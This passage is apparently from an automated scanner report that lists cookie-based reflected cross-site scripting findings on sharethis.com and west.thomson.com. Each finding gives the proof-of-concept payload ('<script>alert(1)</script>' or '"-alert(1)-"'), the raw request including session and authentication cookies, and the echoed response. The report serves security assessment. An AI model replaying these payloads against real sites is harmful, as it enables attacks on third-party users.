if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"296638382",Pid:"p92429851",Arc:"200925855",Location:
...[SNIP]...
Exp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1d9b4a<script>alert(1)</script>cfcd3ff335d', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:
...[SNIP]...

5.251. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 4bf4e<script>alert(1)</script>14929ac7093 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.computerworlduk.com%2Fnews%2Fsecurity%2F3276305%2Foracle-responds-to-hacker-group-and-patches-javacom-vulnerability%2F%3Folo%3Drss&jsref=&rnd=1303854579845 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==4bf4e<script>alert(1)</script>14929ac7093; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Tue, 26 Apr 2011 21:51:26 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==4bf4e<script>alert(1)</script>14929ac7093
userid:
</div>
...[SNIP]...

5.252. http://west.thomson.com/Error/500Error.aspx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /Error/500Error.aspx

Issue detail

The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc738"-alert(1)-"79350713e7 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Error/500Error.aspx?aspxerrorpath=/store/productdetail.aspx HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwndc738"-alert(1)-"79350713e7; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA; UserSiteIdIdentifier=; .WTCAUTH=15EB1E2BD55FB642DEFDF69E45C933941D077548D9E77F5DFD86AFA9231864655A2D3B0A5DA53C12ECD77027BFA162DFE1C25838CD6ED0BA7EA11DF766E81FF9BE80932A802690C8D89CCD970BFE43D957372263E299FCB576D90CB191BE9C03BFA81FE18D6C1ABC185B6A95A9C3FE7C6D15760BFC5FE4F3A675D865307B7D2C00D2ADADD2A8C8C503C9A225B6F3DB06817479DC6714AA5F037A2AE2E40D4090AC151A6DF079A011C7D783412F0443C1E4CC8EA514A71C6F69B68B045D51D4F25992FD629E534853F1810AB486114ECE9F7CA350D4192436BFB8E836202640C7A7A9CEA9

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:55:25 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: .WTCAUTH=C9FF7856E9ACED67ABC7D0C8A5FDAE33CDEACF09DEFCC5570E0A8A924A24201F8258FB7135280A7F28448CAB067A95119B00780743DE7497762EE4805205001D11678363A8A3FC6D8E445667EA8570FFC7A1EE498C44C0667855AB3678ED9B5EE6BB047A2325EE4E489C2169EF21C3B42AB0B174AA80C0A01428E102F2FF0FD25526FE503392F79FCB7F155B548DF7E1D82FA3E1E3E8B251C4F418BEEA6788D8F6B169B33738A9815FD11B169190FBFAE099A45B8E0298ADF0404D7044F018323C45436AF53BA4CFD5C276AEE5A77031A77FC309A88DC43FD379437EF11EA0412EE50F3D; expires=Tue, 26-Apr-2011 21:25:25 GMT; path=/; HttpOnly
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=4683810F76C44FFC48F4CE8A226F3DF6B56E202440466B70E0E2EC0BFC655BDD3919395E3ECFDA7F55432E1DCD2D3B698155AD60190EF935A389EEAABFD4358AF3D6DAA4090B42CB9EC6E44501F1E58DA0F41FF9555AD9AD02195AF90AB95292787CE8672CA06EBEBA10679C367925C87B3CC9ED9A47E63CA9BE33A8325C9E6BD2A7705AAB4ABFF73E60B4F71D2F85D6170897469C5F7DFFE40C361614F9681117D19BA922FD8DFB1FBE4B4825AC53659E38CE040F22AB10000FC9C7EFFAF5CCDF8286414B796FC666C38C3EBF00991E5AA550B17D243F31C1BE9AB1B573283414036084; path=/
Set-Cookie: ASP.NET_SessionId=4lltrsxzhoybk4kglvvfuqok; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 78086


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
ascript'>
var R3_COMMON = new r3_common();
R3_COMMON.setApiKey("756bd9ec9a083c52");
R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/");
R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwndc738"-alert(1)-"79350713e7");
R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");


r3();
</script>
...[SNIP]...

5.253. http://west.thomson.com/Signin.aspx [anonymous_userid_1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /Signin.aspx

Issue detail

The value of the anonymous_userid_1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7942c"-alert(1)-"151728b75d8 was submitted in the anonymous_userid_1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fPromCode%3d571423&PromCode=571423 HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}7942c"-alert(1)-"151728b75d8; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:09:23 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 78100


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
("756bd9ec9a083c52");
R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/");
R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwn");
R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}7942c"-alert(1)-"151728b75d8");


r3();
</script>
...[SNIP]...

5.254. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /productdetail/160547/12484463/productdetail.aspx

Issue detail

The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e120e"-alert(1)-"301dcb340ea34b3b7 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal&R=160547&Product_id=12484463&__EVENTTARGET=ctl00%24placeHolderTopNavigation%24placeHolderContent%24ctl00%24addToCartBtnsubmitButton&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPaA8FDzhjZGQyM2EzNjQ2ODFlNxgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAwVZY3RsMDAkcGxhY2VIb2xkZXJUb3BOYXZpZ2F0aW9uJHBsYWNlSG9sZGVyQ29udGVudCRjdGwwMCRhbGxWb2x1bWVzTGlzdCRjdGwwMCRzZWxlY3RWb2x1bWUFRGN0bDAwJHBsYWNlSG9sZGVyVG9wTmF2aWdhdGlvbiRwbGFjZUhvbGRlckNvbnRlbnQkY3RsMDAkYWRkVG9DYXJ0QnRuBUJjdGwwMCRwbGFjZUhvbGRlclRvcE5hdmlnYXRpb24kcGxhY2VIb2xkZXJDb250ZW50JGN0bDAwJHByaWNlSXRCdG7p6i1rSuwGZPsbIAeDFAht4oWwwQ%3D%3D&ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2C+title%2C+author+or+ISBN&ctl00%24placeHolderTopNavigation%24placeHolderContent%24ctl00%24selectVolumeDate=&ctl00%24placeHolderTopNavigation%24placeHolderContent%24ctl00%24orgTypeDropDown=-1&chkCCMe=CC+Me HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal
Cache-Control: max-age=0
Origin: http://west.thomson.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwne120e"-alert(1)-"301dcb340ea34b3b7; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=E76869171E1A0ADDDC87DE0666682051A5ABA524C2901C7CCEF31A6788A7A438C98C00E7ABD27B50057AA9B35AF82318BE32CAAF21BCE46BA3E3E2EF6BAD7265022CF6605B0D106AF37CB15E717B49BE7FA125545B49CD98D1796358E96925E259D28F2A8CB5B16681BF5B9DE5EB533CEFC7E936BC98024D18199973772A2B0420054643FF9639F13C27CBBB80C1152B2BC7EF70BDEC6C72A6C3ED2F16912510EBC9C641BEB2DCBD2784D94A08DAC3A2CB0C92EBE86CA6DAE5A52262E83175C215F1D237D9058600C65D041AC94F24F8BD7FAFEA186A82F05284BBAB97540DA15E7C4840; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%5D; s_cc=true; s_ppv=100; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_sq=thwest%3D%2526pid%253DBankruptcy%252520Exemption%252520Manual%25252C%2525202010%252520ed.%252520%252528West%252527s%252526%252523174%25253B%252520Bankruptcy%252520Series%252529%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Btry%25257Bctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524ctl00%252524addToCartBtnHideS%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:59:32 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: ASP.NET_SessionId=dag2zus12j0yz0nlntryrcee; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 78094


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
ascript'>
var R3_COMMON = new r3_common();
R3_COMMON.setApiKey("756bd9ec9a083c52");
R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/");
R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwne120e"-alert(1)-"301dcb340ea34b3b7");
R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");


r3();
</script>
...[SNIP]...

5.255. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /productdetail/160547/12484463/productdetail.aspx

Issue detail

The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3753"-alert(1)-"1bbca0be6e9 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwne3753"-alert(1)-"1bbca0be6e9; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:35:22 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: ASP.NET_SessionId=b4ir1ropqmrczsbyznt5ccva; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 78088


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
ascript'>
var R3_COMMON = new r3_common();
R3_COMMON.setApiKey("756bd9ec9a083c52");
R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/");
R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwne3753"-alert(1)-"1bbca0be6e9");
R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");


r3();
</script>
...[SNIP]...

5.256. http://west.thomson.com/store/DOTD.aspx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/DOTD.aspx

Issue detail

The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61497"-alert(1)-"12b550c25c9 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /store/DOTD.aspx?Product_id=12484463&PromCode=645229L86530&PromType=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn61497"-alert(1)-"12b550c25c9; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:44:37 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: ASP.NET_SessionId=ah4ejmu0ygj3wwn2xfvezn4u; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 78078


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
ascript'>
var R3_COMMON = new r3_common();
R3_COMMON.setApiKey("756bd9ec9a083c52");
R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/");
R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwn61497"-alert(1)-"12b550c25c9");
R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");


r3();
</script>
...[SNIP]...

5.257. http://west.thomson.com/store/DOTD.aspx [anonymous_userid_1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/DOTD.aspx

Issue detail

The value of the anonymous_userid_1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfd38"-alert(1)-"37f2d2542d7 was submitted in the anonymous_userid_1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /store/DOTD.aspx?Product_id=12484463&PromCode=645229L86530&PromType=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}bfd38"-alert(1)-"37f2d2542d7; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:51:22 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 78106


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
("756bd9ec9a083c52");
R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/");
R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwn");
R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}bfd38"-alert(1)-"37f2d2542d7");


r3();
</script>
...[SNIP]...

5.258. http://west.thomson.com/store/product.aspx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/product.aspx

Issue detail

The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc5a9"-alert(1)-"7be52016318 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

